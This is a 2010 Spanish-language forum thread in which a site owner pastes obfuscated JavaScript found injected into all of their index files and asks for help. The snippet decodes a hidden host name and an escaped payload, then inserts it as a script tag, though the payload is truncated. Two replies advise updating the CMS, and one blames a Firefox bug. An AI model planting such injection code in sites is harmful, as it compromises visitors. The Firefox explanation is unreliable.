Foros del Web » Creando para Internet » Diseño web »

inyeccion de codigo??

Estas en el tema de inyeccion de codigo?? en el foro de Diseño web en Foros del Web. hola gente hace unas semanas me surgio un problemita q creo no se si ya esta bien. a mi suponer me inyectaron codigo en mi ...
  #1 (permalink)  
Antiguo 19/04/2010, 12:51
 
Fecha de Ingreso: junio-2009
Mensajes: 5
Antigüedad: 14 años, 10 meses
Puntos: 0
Pregunta inyeccion de codigo??

hola gente

hace unas semanas me surgio un problemita q creo no se si ya esta bien.

a mi suponer me inyectaron codigo en mi sitio.

Cuando solicitaba mi sitio me aparecia una pantalla blanca con un error de sintaxis en el index.php del raiz. Cuando abro el index para ver q era lo q estaba tirando ese erro me encuentro con un codigo q nunca habia visto

<!--Injection_head[SessionId= ,version=2.0,type=FindDomainName,CRC32= ]--><script>var uid = '', path=' ', host=String.fromCharCode(111,103,106,111,118,112,1 03,114,110,118,46,105,110);</script><script>var PyST41 = "e"; eval("var SNmr81 = /k"+"ok"+"o11/i"+"g"); var nBwJ82 = "%"; var HPHb31 = "koko1164koko116Fk......................"; var tpsH92 = document.createElement("script"); tpsH92.type = "text/javascript"; tpsH92.text = window["un"+PyST41+"sc"+"ap"+PyST41+""](HPHb31["r"+""+PyST41+"p"+"lac"+PyST41](SNmr81,nBwJ82)); document.body["app"+PyST41+"ndChild"](tpsH92); </script><!--Injection_tail[SessionId=645D848E]-->

le borre esto, y luego dio el mismo error en otro index pero esta vez de extension ".html". Este cdigo estaba plasmado en todos los index .php y .html del sitio.

La base de datos no parece estar mal. No puedo detectar por donde me entraron pero si se q la modificacion se realizo en un dia en el q yo no estuve trabajando sobre el sitio, por esta razon sospecho q es un ataque.

Si alguien tiene una idea de q puede ser con exactitud y decirme q hacer se lo agradeceria.
  #2 (permalink)  
Antiguo 20/04/2010, 05:55
 
Fecha de Ingreso: abril-2010
Ubicación: Entre la eternidad y la inmensidad .
Mensajes: 296
Antigüedad: 14 años
Puntos: 6
Respuesta: inyeccion de codigo??

Una posibilidad: si tienes algún gestor de contenidos actualizalo.
saludos.
  #3 (permalink)  
Antiguo 20/04/2010, 08:50
 
Fecha de Ingreso: enero-2009
Mensajes: 455
Antigüedad: 15 años, 2 meses
Puntos: 11
Respuesta: inyeccion de codigo??

Cita:
pero si se q la modificacion se realizo en un dia en el q yo no estuve trabajando sobre el sitio
como sabes esto?? lo que te recomendaría es como te dicen, si usas algun CMS actualizalo para ver si es por algún bug por donde entraron
  #4 (permalink)  
Antiguo 04/05/2010, 12:01
 
Fecha de Ingreso: mayo-2010
Mensajes: 1
Antigüedad: 13 años, 11 meses
Puntos: 0
Respuesta: inyeccion de codigo??

Se sabe esa fecha porq queda registrado la fecha de las modificaciones realizadas en los archivos.

Por lo q lei por ahi, q no puedo volver a encontrar ese foro en ingles para dejar las referencia, es por un bug q tenia firefox q creo q ya lo modificaron.
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta

SíEste tema le ha gustado a 1 personas




La zona horaria es GMT -6. Ahora son las 16:20.